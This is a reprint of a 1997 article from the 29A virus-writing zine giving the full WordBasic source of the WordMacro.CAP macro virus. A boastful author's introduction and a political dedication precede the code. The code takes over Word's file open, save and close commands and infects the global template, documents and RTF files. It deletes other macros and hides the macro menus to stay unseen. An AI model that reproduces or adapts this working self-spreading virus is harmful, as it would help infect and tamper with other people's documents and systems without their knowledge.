Copy Link
Add to Bookmark
Report
29A Issue 02 05 06
'
' ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
' WordMacro.CAP ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
' by Jacky Qwerty/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
' ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
' ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
'
' Hello people, well here it is. Theres nothin more to say about this babe.
' It has ranked first in several "Top 10 virus" listz as the most prevalent
' virus and has kicked several AVer's assez out there due to its suposedly
' "complex" featurez - well F-Potatoe says erm.. 8*/ - and by its ability to
' create spontaneously generated variantz from itself. It is the CAP macro
' virus and here is its full source code, bein first released in 29A#2.
'
' Most of the CAP featurez have been fully described before, includin some
' comented code fragmentz. The main diference between the followin source
' code and the original i wrote some months ago is that this code has been
' indented for better understandin, while the original version was left-jus-
' tified prior to release. At this point i think its worthless to coment
' each line in the virus code considerin it has been done in full detail be-
' fore. For that purpose i suggest to read the past articlez: "Macro virus
' tricks" and "WordMacro.CAP description" for further information. Here only
' a quick review of the CAP main featurez is given:
'
' * No "SaveAs" problem: drive, path and format work in SaveAs dialog boxez.
' * Works in all existing Word languagez. Automacroz not needed for this.
' * Works in all Word platformz: PC, MAC, POWERMAC, etc. some virusez can't.
' * Guaranted to survive even if other macro virusez are currently present.
' * Internal generation count implemented, not using any .INI to store it.
' * Full stealth implemented, either by disabling or/and deleting submenuz.
' * Infects RTF filez too, i.e. saves them as templatez as with any DOC.
' * No payload. As the guy from NesCafee who wrote the Concept virus said:
' "This is enough to prove my point" #8).
'
'
' Who TF is CAP ?
' ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
' This virus was dedicated to a well known corrupt political figure in Vene-
' zuela: Carlos Andrs Prez, better known as CAP, alias "El Gocho", former
' president of Venezuela twice, durin the late 70's and the late 80's. Seve-
' ral eventz in the social history of Venezuela were badly marked by this
' prepotent stubborn ninja turtle headed man, most notably durin the Septem-
' ber 1996 timeframe, when to the astonished sight of more than one million
' people, he was found "not guilty" for the chargez of robery and malversa-
' tion of public fundz. After the judgement, he was already planin his can-
' didature to postulate for the next presidential electionz. Grrr...
'
' All these eventz encouraged the writin of this virus in mishap of this so-
' cial human virus known as CAP. The internal stringz translate as:
'
' C.A.P: a social virus.. and now a digital one..
' "j4cKy Qw3rTy" (jqw3rty@hotmail.com).
' Venezuela, Maracay, Dic 1996.
' P.S. Whatcha doin gochito? You'll never be Simon Bolivar.. Clown!
'
'
' Greetz
' ÄÄÄÄÄÄ
' The greetz go this time to:
'
' All the guyz from undernet and effnet #virus on IRC: keep lamerz out ;)
' Microsoft for such big holez in their office aplicationz: drunk boyz..!
'
'
' Disclaimer
' ÄÄÄÄÄÄÄÄÄÄ
' This sample code is for educational purposez only. The author is not res-
' ponsible for any problemz caused due to use/misuse of this file.
'
'
' (c) 1997. Jacky Qwerty / 29A.
Macro: CAP - description: "F%"
ÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
'C.A.P: Un virus social.. y ahora digital..
'"j4cKy Qw3rTy" (jqw3rty@hotmail.com).
'Venezuela, Maracay, Dic 1996.
'P.D. Que haces gochito ? Nunca seras Simon Bolivar.. Bolsa !
End Sub
Dim Shared M$(9)
Sub S(F$)
On Error Resume Next
S$ = "F%" 'virus mark
D$ = "Macro"
C$ = "Close"
B$ = "Open"
A$ = "File"
M$(0) = "CAP" 'build namez for the basic set of macroz
M$(3) = A$ + C$
M$(5) = A$ + "Save"
M$(2) = A$ + B$
M$(9) = A$ + "Templates"
A$ = "Auto"
M$(6) = M$(5) + "As"
M$(1) = A$ + B$
M$(8) = A$ + "Exec"
M$(4) = A$ + C$
M$(7) = "Tools" + D$
M = 0
N = 0
For T = 1 To 0 Step - 1 'scan macros inside global
For I = CountMacros(T) To 1 Step - 1 ' and active template and
B$ = MacroName$(I, T) ' delete all foreign macroz
If S$ = Left$(MacroDesc$(B$), 2) Then
For J = 0 To 9
If B$ = M$(J) Then
If T Then N = N + 1 Else M = M + 1
J = 9
End If
Next
Else
ToolsMacro .Name = B$, .Show = T + T + 1, .Delete
End If
Next
Next
If F$ <> "" Then
If M < 10 And N Then 'global template infection
ToolsOptionsSave .GlobalDotPrompt = 0, .FastSaves = 1, .AutoSave = 1, .SaveInterval = "10"
For I = 0 To 9 'copy basic set of macroz
If I <> 7 Then K = - 1 Else K = 0
MacroCopy F$ + ":" + M$(I), M$(I), K
Next
'increment generation count
B$ = S$ + LTrim$(Str$(Val(Mid$(MacroDesc$(M$(7)), 3)) + 1))
ToolsMacro .Name = M$(7), .Show = 1, .Description = B$, .SetDesc
A$ = MenuText$(0, 1) 'copy localized file
For I = CountMacros(1) To 1 Step - 1 ' related macroz
J = 0
B$ = MacroName$(I, 1)
Select Case MacroDesc$(B$)
Case S$ + "O"
J = 2
Case S$ + "C"
J = 3
Case S$ + "S"
J = 5
Case S$ + "SA"
J = 6
End Select
If J Then
C$ = MenuItemMacro$(A$, 0, J)
If Left$(UCase$(C$), Len(M$(J))) <> UCase$(M$(J)) And Left$(C$, 1) <> "(" Then MacroCopy F$ + ":" + B$, C$, K
End If
Next
T = - 1
For I = 0 To 1 'delete menu itemz (ToolsMacro, etc.)
If I Then J = 1 Else J = 6
A$ = MenuText$(I, J)
J = CountMenuItems(A$, I) - 1
For M = J To 1 Step - 1
If InStr(MenuItemMacro$(A$, I, M), D$) Then
If I Then
B$ = MenuItemMacro$(A$, I, M - 2)
If UCase$(B$) <> UCase$(M$(9)) And Left$(B$, 1) <> "(" Then MacroCopy M$(9), B$, K
Else
M = M + 1
End If
For T = M To M - 1 Step - 1
If T > 3 Then ToolsCustomizeMenus .MenuType = I, .Position = T, .Name = MenuItemMacro$(A$, I, T), .Menu = A$, .Remove, .Context = 0
Next
M = 1
T = 0
End If
Next
Next
If T Then
For I = 6 To J
If Left$(MenuItemMacro$(A$, 1, I), 1) = "(" And Left$(MenuItemMacro$(A$, 1, I - 2), 1) = "(" Then
For T = 1 To 3 Step 2
B$ = MenuItemMacro$(A$, 1, I - T)
If Left$(B$, 1) <> "(" Then MacroCopy M$(T + 6), B$, K
Next
I = J
End If
Next
End If
End If
Dim D As FileSaveAs 'document, template and RTF infection
GetCurValues D
If N < 10 And D.Format = 1 Or D.Format = 0 Or D.Format = 6 Then
D.Format = 1
For I = CountMacros(0) To 1 Step - 1
B$ = MacroName$(I, 0)
If B$ <> M$(7) Then K = - 1 Else K = 0
MacroCopy B$, F$ + ":" + B$, K
Next
FileSaveAs D
End If
End If
Err = 0
End Sub
Sub FO 'FileOpen macro jumps here
On Error Resume Next
DisableAutoMacros
On Error Goto E
Dim D As FileOpen
GetCurValues D
Dialog D
FileOpen D
S(D.Name)
E:
End Sub
Sub FC 'FileClose macro jumps here
On Error Resume Next
DisableAutoMacros
S(FileName$())
FileClose
End Sub
Sub FS 'FileSave macro jumps here
On Error Resume Next
DisableAutoMacros
On Error Goto F
FileSave
S(FileName$())
F:
End Sub
Sub FSA 'FileSaveAs macro jumps here
On Error Resume Next
DisableAutoMacros
On Error Goto G
Dim D As FileSaveAs
GetCurValues D
If D.Format <> 1 Then
Dialog D
FileSaveAs D
S(D.Name)
Else
T = Window()
W$ = D.Name
FileNew .Template = FileName$()
On Error Goto H
GetCurValues D
D.Name = W$
Dialog D
FileSaveAs D
On Error Goto G
S(D.Name)
If T >= Window() Then T = T + 1
WindowList T
H:
FileClose 2
End If
G:
End Sub
Macro: FileClose - description: "F%C"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.FC
End Sub
Macro: FileOpen - description: "F%O"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.FO
End Sub
Macro: FileSave - description: "F%S"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.FS
End Sub
Macro: FileSaveAs - description: "F%SA"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.FSA
End Sub
Macro: AutoClose - description: "F%"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.S(FileName$())
End Sub
Macro: AutoExec - description: "F%"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
DisableAutoMacros 0
CAP.S("")
End Sub
Macro: AutoOpen - description: "F%"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
On Error Resume Next
CAP.S(FileName$())
End Sub
Macro: FileTemplates - description: "F%"
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
End Sub
Macro: ToolsMacro - description: "F%0" 'this macro holds the generation count
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Sub MAIN
End Sub
' End
